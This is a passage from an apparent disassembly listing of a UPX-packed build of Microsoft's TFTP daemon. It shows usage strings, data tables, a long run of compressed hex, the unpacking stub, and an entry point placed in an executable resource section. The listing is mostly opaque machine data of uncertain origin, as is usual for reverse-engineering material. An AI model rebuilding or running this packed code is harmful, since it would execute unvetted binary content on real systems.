db ' ValidWriteFiles- only matching files will be accepted, eg. "w'
db '*.txt" ',0Ah
db ' '
db ' ',0Ah
db 'Client: '
db ' ',0Ah
db ' tftp [-i] servername {get|put} src_file dest_file '
db ' ',0Ah
db ' -i from binary mode, else ascii mode is used. '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' ================================================================'
db '======== ',0Ah,0
align 8
aTftpd db 'Tftpd',0 ; DATA XREF: sub_1001665+B�o
; seg000:off_1005CB0�o
align 10h
off_1005CB0 dd offset aTftpd ; DATA XREF: sub_1001570:loc_1001646�o
; "Tftpd"
dd offset sub_1001665
align 10h
off_1005CC0 dd offset aErrorUndefined ; DATA XREF: sub_100230A+73�r
; "Error undefined"
dd offset aFileNotFound ; "File not found"
dd offset aAccessViolatio ; "Access violation"
dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
dd offset aUnknownTransfe ; "Unknown transfer ID"
dd offset aFileAlreadyExi ; "File already exists"
dd offset aNoSuchUser ; "No such user"
dd offset aOptionNegotiat ; "Option negotiation failure"
align 8
dword_1005CE8 dd 2Ah, 0Dh dup(0) ; sub_10037BF+87�o
dword_1005D20 dd 2Ah, 0Dh dup(0) ; sub_100333A+163�o ...
dword_1005D58 dd 2Ah, 0Dh dup(0) ; sub_10037BF+EA�o
dword_1005D90 dd 2Ah, 0Ch dup(0) ; sub_10037BF+11A�o
dword_1005DC4 dd 1 align 10h
dword_1005DD0 dd 0 ; sub_1001E73:loc_1001F36�r ...
dword_1005DD4 dd 0 dword_1005DD8 dd 0 ; sub_1001665:loc_100182E�r ...
dword_1005DDC dd 0 ; sub_1001665+8B�r ...
dword_1005DE0 dd 0 ; sub_1001E73:loc_1001F0C�r ...
align 8
dword_1005DE8 dd 0 ; sub_1001A91+2B3�o
dword_1005DEC dd 0 ; sub_1001A1F+52�r ...
dword_1005DF0 dd 0 ; sub_1001A1F+5E�w ...
dword_1005DF4 dd 0 ; sub_1001A91+59�w ...
dword_1005DF8 dd 0 ; sub_10018DB+EF�r
dword_1005DFC dd 0 dword_1005E00 dd 0 ; sub_1002219+D5�o
db 3 dup(0)
dword_1005E07 dd 0 ; sub_1003910+6B�r ...
align 4
dd 7Ch dup(0)
dword_1005FFC dd 0 dword_1006000 dd 0 dword_1006004 dd 0 dword_1006008 dd 0 dword_100600C dd 0 dd 4 dup(0)
dword_1006020 dd 6 dup(0) ; seg000:01001D78�o ...
dword_1006038 dd 0 ; sub_10018DB+34�w ...
dword_100603C dd 0 dword_1006040 dd 0 ; sub_1001DEB:loc_1001E35�r
dword_1006044 dd 0 ; sub_1001665+DB�r ...
dword_1006048 dd 6 dup(0) dword_1006060 dd 6 dup(0) ; sub_1001A1F+2�o ...
dword_1006078 dd 0 ; sub_10019F0+F�w ...
dword_100607C dd 0 dword_1006080 dd 6 dup(0) ; sub_100287F+1�o ...
dword_1006098 dd 0 ; sub_10018DB+25�w ...
dword_100609C dd 0 dword_10060A0 dd 0 ; sub_10018DB+A2�r ...
dd 7 dup(0)
dword_10060C0 dd 0 ; sub_1001665:loc_1001857�o
dword_10060C4 dd 0 dword_10060C8 dd 0 dword_10060CC dd 0 dd 0Ch dup(0)
dword_1006100 dd 4 dup(0) ; sub_1002219:loc_10022E9�o
dword_1006110 dd 0 align 10h
dword_1006120 dd 0 ; sub_1001665+63�o ...
dword_1006124 dd 0 ; sub_1001665+D1�w ...
dword_1006128 dd 0 ; sub_1001665+E1�w
dword_100612C dd 0 ; sub_1001E73+5A�w ...
dword_1006130 dd 0 ; sub_1001E73+60�w ...
dword_1006134 dd 0 ; sub_1001665+EB�w ...
dword_1006138 dd 0 ; sub_1001665+F1�w ...
align 10h
dword_1006140 dd 64h dup(0) dword_10062D0 dd 0FFFFFFFFh dword_10062D4 dd 0FFFFFFFFh dword_10062D8 dd 0 align 1000h
seg000 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 1007000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_1007000 dd 400h dup(0) dd 0C4h, 1Ch, 69784501h, 6F725074h, 73736563h, 78450100h
dd 646E6170h, 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h
dd 417367h, 74654701h, 61636F4Ch, 6D69546Ch, 44010065h
dd 74656C65h, 69724365h, 61636974h, 6365536Ch, 6E6F6974h
dd 65530100h, 73614C74h, 72724574h, 100726Fh, 45746553h
dd 746E6576h, 65520100h, 656D7573h, 65726854h, 1006461h
dd 4C746547h, 45747361h, 726F7272h, 61570100h, 6F467469h
dd 6E695372h, 4F656C67h, 63656A62h, 43010074h, 74616572h
dd 65764565h, 41746Eh, 696E4901h, 6C616974h, 43657A69h
dd 69746972h, 536C6163h, 69746365h, 1006E6Fh, 70616548h
dd 61657243h, 1006574h, 7661654Ch, 69724365h, 61636974h
dd 6365536Ch, 6E6F6974h, 65480100h, 72467061h, 1006565h
dd 736F6C43h, 6E614865h, 656C64h, 746E4501h, 72437265h
dd 63697469h, 65536C61h, 6F697463h, 4901006Eh, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 69615701h
dd 726F4674h, 746C754Dh, 656C7069h, 656A624Fh, 737463h
dd 61654801h, 6C6C4170h, 100636Fh, 65736552h, 65764574h
dd 100746Eh, 65656C53h, 54010070h, 6E457972h, 43726574h
dd 69746972h, 536C6163h, 69746365h, 1006E6Fh, 70737553h
dd 54646E65h, 61657268h, 0D1000064h, 0
dd 1000000h, 4F676552h, 4B6E6570h, 78457965h, 53010041h
dd 74726174h, 76726553h, 43656369h, 446C7274h, 61707369h
dd 65686374h, 1004172h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 65520100h, 6F6C4367h, 654B6573h, 52010079h
dd 73696765h, 53726574h, 69767265h, 74436563h, 61486C72h
dd 656C646Eh, 1004172h, 53746553h, 69767265h, 74536563h
dd 73757461h, 0DE0000h, 1380000h, 4E010000h, 6669746Fh
dd 64644179h, 61684372h, 65676Eh, 74654701h, 64417049h
dd 61547264h, 656C62h, 0EB00h, 7C00h, 695F0100h, 7474696Eh
dd 6D7265h, 675F5F01h, 616D7465h, 72616E69h, 1007367h
dd 65735F5Fh, 65737574h, 74616D72h, 72726568h, 6C5F0100h
dd 6B656573h, 635F0100h, 65736F6Ch, 725F0100h, 646165h
dd 6C616D01h, 636F6Ch, 61657201h, 636F6C6Ch, 63660100h
dd 65736F6Ch, 72660100h, 1006565h, 656D6974h, 635F0100h
dd 72696468h, 655F0100h, 6F6E7272h, 6D5F0100h, 7269646Bh
dd 6F660100h, 6E6570h, 69746301h, 100656Dh, 6E6F635Fh
dd 6C6F7274h, 1007066h, 6378655Fh, 5F747065h, 646E6168h
dd 3372656Ch, 5F5F0100h, 5F746573h, 5F707061h, 65707974h
dd 5F5F0100h, 665F5F70h, 65646F6Dh, 5F5F0100h, 635F5F70h
dd 6F6D6D6Fh, 1006564h, 6A64615Fh, 5F747375h, 76696466h
dd 72700100h, 66746E69h, 5F5F0100h, 5F5F5F70h, 74696E69h
dd 766E65h, 63585F01h, 69467470h, 7265746Ch, 655F0100h
dd 746978h, 706F5F01h, 1006E65h, 6972775Fh, 1006574h, 74697865h
dd 0F60000h, 1440000h, 6D010000h, 6F6D6D65h, 1006576h
dd 6E727473h, 797063h, 75736901h, 72657070h, 6F740100h
dd 65776F6Ch, 52010072h, 70556C74h, 65746164h, 656D6954h
dd 52010072h, 65446C74h, 6574656Ch, 656D6954h, 5F010072h
dd 69727473h, 706D63h, 6F746101h, 5F010069h, 616F7469h
dd 74520100h, 7265446Ch, 73696765h, 57726574h, 45746961h
dd 5F010078h, 736B6863h, 1006B74h, 436C7452h, 74616572h
dd 6D695465h, 75517265h, 657565h, 6C745201h, 69676552h
dd 72657473h, 74696157h, 74520100h, 6572436Ch, 54657461h
dd 72656D69h, 1000000h, 0F40000h, 57010000h, 6F534153h
dd 74656B63h, 6FFF0041h, 73FF00h, 41535701h, 6E657645h
dd 6C655374h, 746365h, 10009FFh, 47415357h, 764F7465h
dd 616C7265h, 64657070h, 75736552h, 0FF00746Ch, 5701000Fh
dd 65524153h, 72467663h, 0FF006D6Fh, 5701000Ah, 6C434153h
dd 4565736Fh, 746E6576h, 3FF00h, 0FF000CFFh, 37FF0002h
dd 17FF00h, 14FFh, 0
dd 4550h, 3014Ch, 3 dup(0)
dd 30F00E0h, 0C05010Bh, 3400h, 1800h, 0
dd 3A50h, 1000h, 5000h, 1000000h, 1000h, 200h, 2 dup(5)
dd 4, 0
dd 8000h, 600h, 0EDCBh, 80000003h, 40000h, 1000h, 100000h
dd 1000h, 0
dd 10h, 2 dup(0)
dd 3BFCh, 8Ch, 7000h, 3D8h, 6 dup(0)
dd 1180h, 1Ch, 8 dup(0)
dd 238h, 88h, 1000h, 180h, 6 dup(0)
dd 7865742Eh, 74h, 3310h, 1000h, 3400h, 600h, 3 dup(0)
dd 60000020h, 7461642Eh, 61h, 12DCh, 5000h, 0E00h, 3A00h
dd 3 dup(0)
dd 0C0000040h, 7273722Eh, 63h, 3D8h, 7000h, 400h, 4800h
dd 3 dup(0)
dd 40000040h, 7000h, 3E08h, 749C0000h, 39000000h, 17C60D00h
dd 0EB2E4A64h, 0C60F575Fh, 0B675827h, 0ECE325B7h, 0CCD6CF10h
dd 59EDDE72h, 4339F017h, 0B3BF0F49h, 0D81474A3h, 0D356F440h
dd 0F34912FBh, 0F9E28B41h, 7C9B3D2Dh, 408BCE3Bh, 0A74F620h
dd 0B36820ECh, 301BFAD8h, 9A3516EBh, 6CD26FC5h, 439C9B51h
dd 0F0C30D83h, 0ED3AA501h, 2F32104Dh, 832C6909h, 0F5501D57h
dd 9060C060h, 447262Eh, 69295C54h, 9F0404FBh, 0FF840F55h
dd 0ABFF70B8h, 98147D81h, 0F01EB5A2h, 0F8942804h, 7D6FD685h
dd 558B38EBh, 3939B90Ch, 2A7E104Dh, 0AD4B0A2Dh, 750D8F01h
dd 85DBFF53h, 575936Fh, 112E2780h, 8488D68Ah, 0FE009035h
dd 0BE3C46FFh, 196D2AB5h, 297FB102h, 5256D97Ch, 0FA0F1Eh
dd 0A378E8FAh, 0D8CAF6h, 8B9D12EBh, 88087C7h, 81E68A60h
dd 5A1A9634h, 68A15356h, 0B41C0FF2h, 0F0108A68h, 128D8016h
dd 5351630h, 440DCD00h, 86F4EA5h, 380929F2h, 0B6D8321Dh
dd 586CDB68h, 40367508h, 6DF44CF8h, 0CCD1B2A4h, 504F8D71h
dd 0B50C8948h, 0F07D4899h, 0B7174A1Eh, 40B0E86h, 3752239h
dd 0B1C8E4C5h, 37326A6Eh, 5CE8315Fh, 9A012DCh, 343F516Bh
dd 65739809h, 3201BC5Bh, 321C30FFh, 0E464D957h, 2FB45D20h
dd 20472758h, 5C908827h, 244BF51Fh, 0FD0C1519h, 4B87C3FCh
dd 1F5F5EC0h, 8005EC81h, 0E087023Dh, 57A9A8EDh, 0E8A00FBDh
dd 0D70B0538h, 48096855h, 0A4553517h, 6F55959Ch, 546237ADh
dd 5755ED20h, 0ADCE78EBh, 0B902AA58h, 0F72BFB9Ah, 0F01485C9h
dd 7B980FBh, 0B7FF524Eh, 818D2F77h, 0C68606h, 5C38805Ch
dd 0CD3B2C74h, 85658103h, 1E5CBFEBh, 3B252637h, 36E96CFBh
dd 4D4FCD8Bh, 0FC434BCDh, 8B24A158h, 0FC0D894Fh, 9150005Fh
dd 5D556BE3h, 16C3AE63h, 8E06FF88h, 0B3068A98h, 742A3C4Ah
dd 743F3C1Ch, 7A56DA0Bh, 6F3A57DBh, 0AC514132h, 15730CEEh
dd 0E23625E0h, 0EB46CE26h, 54210917h, 3CDB4A0Ah, 5068D670h
dd 0D43814E2h, 0EE0F1D1Ah, 84188EA3h, 410AFC0Fh, 6E235CA6h
dd 0CC01380Bh, 2333116Ch, 25FFE19Bh, 3805096Ch, 2B76793Ch
dd 0FF6ABDD8h, 68C56068h, 0A164F2F0h, 0EF0B1343h, 8964548Eh
dd 0E0320725h, 0AF68127h, 0E8658970h, 8B530F4Ah, 647EE736h
dd 5C704C4h, 4362D0h, 47C4D409h, 0C81C416Ch, 0E7EF0C15h
dd 80775B3h, 815CC0Dh, 0CD0A110h, 0B6E77C23h, 2CD8FA08h
dd 0A1DC2BA8h, 0E845DC4h, 0DCD937E0h, 5878D068h, 68AC1B84h
dd 503D9DB6h, 2A507A64h, 470816A2h, 0CF81DB37h, 0A5D85504h
dd 8D510062h, 1BDB2355h, 0E52E0DBh, 0E44D3DD4h, 14803F51h
dd 0AF92DD3h, 88003AF2h, 0A16DEDD8h, 46852CB5h, 0D44D3CE0h
dd 3460C51h, 52E4DD8Eh, 146C051Eh, 0FE6750F9h, 0ECCF6D52h
dd 0DCEC1F22h, 0D04D8909h, 0B76C5150h, 9C3EF9B6h, 2FFF8BC3h
dd 0E0A152D0h, 9867B616h, 0F047EC0Ch, 0DE160D26h, 8BD77577h
dd 90C35DE5h, 51DC5500h, 25E6CD74h, 0CC7C05h, 3BE7B068h
dd 5F680AD0h, 90F24Fh, 30AC2D85h, 80D0F9Eh, 4FBE466Bh
dd 0BCC0h, 807201h, 92A33D20h, 0A200FFFh, 74736241h, 74636172h
dd 0C003203Ah, 200AF556h, 69AD6854h, 3FFF595h, 61EA6D40h
dd 4652206Eh, 38372043h, 0F6002033h, 20A95776h, 6F186164h
dd 0B64A2E6Eh, 497EAAD6h, 966C2074h, 0B56F4546h, 705EDD55h
dd 360F726Fh, 0B0723639h, 0F652F556h, 0B0657571h, 1DEE95h
dd 70733329h, 564A7761h, 61B6AAE5h, 26F46887h, 0B7557B76h
dd 0A06F7253h, 5468630Eh, 1D942C02h, 0D8004A2Eh, 0A98007Fh
dd 535520E8h, 0A0454741h, 0AAB78004h, 6C6174D9h, 56C82329h
dd 7B958A42h, 26DBC00h, 3A648A6Dh, 2326A2Fh, 28009858h
dd 7FFF6550h, 297342F6h, 6F634A2Eh, 2F207970h, 686F4D2Fh
dd 0ED6E6973h, 41FB4333h, 3039705Fh, 2E5C6357h, 19377865h
dd 2EB023DAh, 4D637395h, 76DBB2B7h, 99203EB6h, 0D505062h
dd 0AB3D68h, 54596CFCh, 76696795h, 73165865h, 2770A063h
dd 59574A91h, 0A5EA66B0h, 9E63E049h, 632E36D0h, 266D56Bh
dd 116465A2h, 4EF08112h, 16373F76h, 0C13A8402h, 845173E2h
dd 0E2B07650h, 59E0662Dh, 53802D00h, 3323841Ch, 0E02C4ECDh
dd 0F0044A6Bh, 4A956446h, 0ACAAD813h, 5B954B73h, 0C61775F8h
dd 5D81642Dh, 66046512h, 3010885Dh, 43352B4Ah, 0ED0856C0h
dd 491E2030h, 0E2DAE0Fh, 2E09BA76h, 8772F083h, 64407014h
dd 0F4940B23h, 0D9CE2E4Dh, 6116B40Ah, 6930544Ah, 56300252h
dd 0DA920138h, 72CE8046h, 0E01488D9h, 0F146C602h, 0C9ADB5C9h
dd 1D6272A6h, 29241B75h, 0D95A4A9Ah, 6E43834Ah, 7146D5C0h
dd 0EF5B0577h, 966E6E75h, 78D08129h, 0E163388Eh, 0E0B020DAh
dd 0C7B25003h, 4AEB945Bh, 14314AEBh, 5664AB58h, 0B040D130h
dd 73BB6947h, 300AF003h, 0B89D9B50h, 0CE0408C4h, 63EB0C66h
dd 0C184F041h, 2F20BBAFh, 0C26063BBh, 629B7D15h, 6D6F2579h
dd 0B03190C4h, 2D96953Ah, 0DB043C64h, 47796CA5h, 600A65B6h
dd 61C057DDh, 2E796907h, 1A029CE0h, 0D0494C43h, 5CB36BE1h
dd 51829B4Ch, 6062B2Eh, 51682AC1h, 93D61DA0h, 0C5436D09h
dd 0CE17856Dh, 96A09943h, 676464E0h, 734FB66Fh, 2EB8EEF1h
dd 77630C95h, 7982654Ch, 7333756Fh, 3FFFD8DFh, 22E01F15h
dd 2E373531h, 382E3535h, 222A2E3Fh, 8925B93h, 63952456h
dd 204BC3C3h, 72657456h, 0B2B61136h, 43229394h, 386B2EC8h
dd 65946F6Eh, 0B2932E58h, 526EBC21h, 0BD624663h, 92DB8690h
dd 58CB785Eh, 93827672h, 666EC7FDh, 22702C74h, 742E2A72h
dd 4822743Fh, 16458F57h, 48495D7Bh, 6B39A509h, 46CD7086h
dd 3A787747h, 0E5181121h, 4E0E3AF2h, 0BD11C00Bh, 7041F845h
dd 35D69C2h, 677B6172h, 5C2DBDE2h, 0C707C68h, 6372147Dh
dd 3614E15Fh, 0D685D173h, 58BD4A09h, 0C44B42Ah, 41B96D6Eh
dd 38286B43h, 4D336F21h, 83DE3C6Ch, 108870C0h, 2D5904F0h
dd 11C6821Eh, 2AC08101h, 5EE04145h, 0EE54A367h, 0B260A07h
dd 16653ED8h, 9A69D8BBh, 0C8905BA6h, 7890B403h, 9B670164h
dd 244050A6h, 2A2B14h, 0EB6416C2h, 905B037h, 8200C8C1h
dd 0C4080009h, 366FA031h, 78451C43h, 0B8507469h, 7C40BEDAh
dd 45E7700Ch, 1169766Eh, 0A8AB1B6Eh, 0BA537109h, 2A661A41h
dd 65477DBAh, 61254C74h, 0BB0D386Ch, 44F6E205h, 650F6C65h
dd 1369A643h, 0B3086553h, 0F3638A39h, 3B185324h, 84973515h
dd 6DB4450Dh, 9FBA39Bh, 36755D52h, 0B365ED54h, 254A2913h
dd 36446157h, 46B6E6F7h, 53675308h, 4B6A624Fh, 2EDC4314h
dd 3DA52276h, 676E497Bh, 20DB2BB6h, 48717A17h, 0D8177027h
dd 0B2CCDB2h, 4621764Ch, 2BBF735Ch, 6F6C431Fh, 0E0486573h
dd 537DEA67h, 2C7928E6h, 2D6C1549h, 194135A2h, 0B02A0A64h
dd 30EC9EDh, 6C754DA2h, 64A47025h, 73ECF731h, 2E6C415Ah
dd 0B02FEDE1h, 2253DBB7h, 54067065h, 53647972h, 8382975h
dd 287073DBh, 0D1000E64h, 6EDB7090h, 4F674337h, 37654B18h
dd 67BF578h, 210A1D4h, 0B6957443h, 44768899h, 11063669h
dd 8952B41h, 0F0513147h, 7B17312Eh, 112E06AFh, 370C3EE0h
dd 2D6B980Bh, 3BF83E7Bh, 0B586EB5Bh, 74625614h, 45DE828Ch
dd 38366DBCh, 0A26F4E01h, 0FA417966h, 0CCBB708Eh, 672F6843h
dd 7049AC65h, 0E9F05410h, 0EBA68246h, 695F7CADh, 0CEBA20DCh
dd 0A6D6295h, 616DC15Fh, 41C35ED7h, 850E2B88h, 0AEBA5D56h
dd 0AD5D1A39h, 656C1172h, 0B866D06Bh, 0A16307D7h, 301F0807h
dd 3C9B99D8h, 1F66080Dh, 8067F766h, 33B3AF8Ah, 43696468h
dd 0BB76470Ch, 0F6F6E49h, 6F666B6Dh, 0C518E2Bh, 256306DBh
dd 7670667Dh, 29F88BB6h, 685F1678h, 0ED9133F1h, 5F0C2FB5h
dd 745F70ACh, 90F3579h, 0C44CCDD6h, 0B21665Fh, 360D6D3Dh
dd 970B7113h, 637B756Ah, 5B05ED76h, 727055DEh, 0F0236669h
dd 0B445AEEFh, 58766ECDh, 0FD9E5E63h, 62D7338Ah, 8E06166Dh
dd 0AF0B345Fh, 1407181Dh, 6B44F657h, 0A2ED74CDh, 0C45A765Fh
dd 5B5F63Ch, 759EA143h, 0B4743F8Eh, 0EFF157A7h, 5208776Fh
dd 0E4556C74h, 9D92D662h, 0F660F66h, 0EDBE0C3h, 6369F337h
dd 696F236Dh, 26610680h, 610478Dh, 0DA9EF72h, 8DB6291h
dd 6B0F6B34h, 0AC6C1E1Dh, 32446639h, 30521401h, 5918831h
dd 0A6DB5A25h, 6F4BFD3h, 53415357h, 6FFF850Dh, 0B82B7302h
dd 0E6116231h, 127B9A53h, 64476983h, 764F2509h, 748B6239h
dd 0ED39254Fh, 0D0F1A6Ch, 74A15B22h, 5F7F7663h, 0ED960A0Fh
dd 29A43149h, 0C0203FFh, 65883102h, 14173759h, 40FFF2A7h
dd 4550FEh, 3014C00h, 30F00E0h, 0C05010Bh, 5E933400h, 2718D837h
dd 810043Ah, 6E4EC33Fh, 3020B63h, 3C040005h, 0A8A476C8h
dd 0EDCB2C80h, 4E4030Dh, 3704D9BEh, 10431004h, 72CF2E4h
dd 708C3BFCh, 0CABB03D8h, 11802BCEh, 0A933800h, 88AC1889h
dd 2FB48064h, 2EE177D8h, 2674787Fh, 0C1EB9033h, 6B0BB71h
dd 60022023h, 90F8242Eh, 0FB5B906Eh, 270E12DCh, 78A36C3Ah
dd 2EC040B9h, 0C3004F72h, 1841B29Bh, 27481070h, 1B40h
dd 3E08F7DCh, 97E9C0Dh, 0FF000000h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_1007000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_1009032
; ---------------------------------------------------------------------------
align 8
loc_1009028: ; CODE XREF: UPX1:loc_1009039�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_100902E: ; CODE XREF: UPX1:010090C6�j
; UPX1:010090DD�j
add ebx, ebx
jnz short loc_1009039
loc_1009032: ; CODE XREF: UPX1:01009020�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_1009039: ; CODE XREF: UPX1:01009030�j
jb short loc_1009028
mov eax, 1
loc_1009040: ; CODE XREF: UPX1:0100904F�j
; UPX1:0100905A�j
add ebx, ebx
jnz short loc_100904B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_100904B: ; CODE XREF: UPX1:01009042�j
adc eax, eax
add ebx, ebx
jnb short loc_1009040
jnz short loc_100905C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_1009040
loc_100905C: ; CODE XREF: UPX1:01009051�j
xor ecx, ecx
sub eax, 3
jb short loc_1009070
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_10090E2
mov ebp, eax
loc_1009070: ; CODE XREF: UPX1:01009061�j
add ebx, ebx
jnz short loc_100907B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_100907B: ; CODE XREF: UPX1:01009072�j
adc ecx, ecx
add ebx, ebx
jnz short loc_1009088
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_1009088: ; CODE XREF: UPX1:0100907F�j
adc ecx, ecx
jnz short loc_10090AC
inc ecx
loc_100908D: ; CODE XREF: UPX1:0100909C�j
; UPX1:010090A7�j
add ebx, ebx
jnz short loc_1009098
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_1009098: ; CODE XREF: UPX1:0100908F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_100908D
jnz short loc_10090A9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_100908D
loc_10090A9: ; CODE XREF: UPX1:0100909E�j
add ecx, 2
loc_10090AC: ; CODE XREF: UPX1:0100908A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_10090CC
loc_10090BD: ; CODE XREF: UPX1:010090C4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_10090BD
jmp loc_100902E
; ---------------------------------------------------------------------------
align 4
loc_10090CC: ; CODE XREF: UPX1:010090BB�j
; UPX1:010090D9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_10090CC
add edi, ecx
jmp loc_100902E
; ---------------------------------------------------------------------------
loc_10090E2: ; CODE XREF: UPX1:0100906C�j
pop esi
mov edi, esi
mov ecx, 61h
loc_10090EA: ; CODE XREF: UPX1:010090F1�j
; UPX1:010090F6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_10090EF: ; CODE XREF: UPX1:01009114�j
cmp al, 1
ja short loc_10090EA
cmp byte ptr [edi], 0
jnz short loc_10090EA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_10090EF
lea edi, [esi+7000h]
loc_100911C: ; CODE XREF: UPX1:0100913E�j
mov eax, [edi]
or eax, eax
jz short loc_1009167
mov ebx, [edi+4]
lea eax, [eax+esi+93D0h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+945Ch]
xchg eax, ebp
loc_1009139: ; CODE XREF: UPX1:0100915F�j
mov al, [edi]
inc edi
or al, al
jz short loc_100911C
mov ecx, edi
jns short near ptr loc_100914A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_100914A: ; CODE XREF: UPX1:01009142�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+9460h]
or eax, eax
jz short loc_1009161
mov [ebx], eax
add ebx, 4
jmp short loc_1009139
; ---------------------------------------------------------------------------
loc_1009161: ; CODE XREF: UPX1:01009158�j
call dword ptr [esi+9464h]
loc_1009167: ; CODE XREF: UPX1:01009120�j
popa
jmp loc_1003A50
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 100A000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 3 dup(0)
dd 10000h, 10h, 80000018h, 3 dup(0)
dd 10000h, 1, 80000030h, 3 dup(0)
dd 10000h, 409h, 48h, 0A05Ch, 374h, 2 dup(0)
dd 7060h, 340374h, 560000h, 5F0053h, 450056h, 530052h
dd 4F0049h, 5F004Eh, 4E0049h, 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
dd 3Fh, 0
dd 40004h, 1, 3 dup(0)
dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 2B0h, 300001h, 300034h, 300039h, 420034h
dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
dd 65006Dh, 0
aMicrosoftCorpo:
unicode 0, <Microsoft Corporation>,0
aR:
unicode 0, <r%>
dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
unicode 0, <TCP/IP Trivial file transfer daemon.>,0
align 4
a8 db '8',0
dw 0Ch
dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh
dd 0
a5_00_2134_1:
unicode 0, <5.00.2134.1>,0
a4:
unicode 0, <4>
dw 0Ah
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h, 690072h
dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh, 66006Fh
dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h, 310038h
dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h, 65h, 660074h
dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
unicode 0, <Microsoft(R) Windows (R) 2000 Operating System>,0
align 10h
db '<',0
dw 0Ch
dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h
dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
dd 31h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h
dd 6F0066h, 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 3 dup(0)
dd 0A494h, 0A45Ch, 3 dup(0)
dd 0A4A1h, 0A46Ch, 3 dup(0)
dd 0A4AEh, 0A474h, 3 dup(0)
dd 0A4BBh, 0A47Ch, 3 dup(0)
dd 0A4C6h, 0A484h, 3 dup(0)
dd 0A4D0h, 0A48Ch, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 76D63B9Ch, 0
; ---------------------------------------------------------------------------
sbb eax, edx
retn 77h
; ---------------------------------------------------------------------------
align 4
dd 7C924C29h, 0
dd 71AB2C69h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 7069006Ch, 61706C68h, 642E6970h, 4D006C6Ch
dd 52435653h, 6C642E54h, 746E006Ch, 2E6C6C64h, 6C6C64h
dd 5F325357h, 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h
dd 65470000h, 6F725074h, 64644163h, 73736572h, 78450000h
dd 72507469h, 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh
dd 65470000h, 41704974h, 54726464h, 656C6261h, 72660000h
dd 6565h, 696F7461h, 2B4h dup(0)
assume ds:seg000
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_100B02F
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
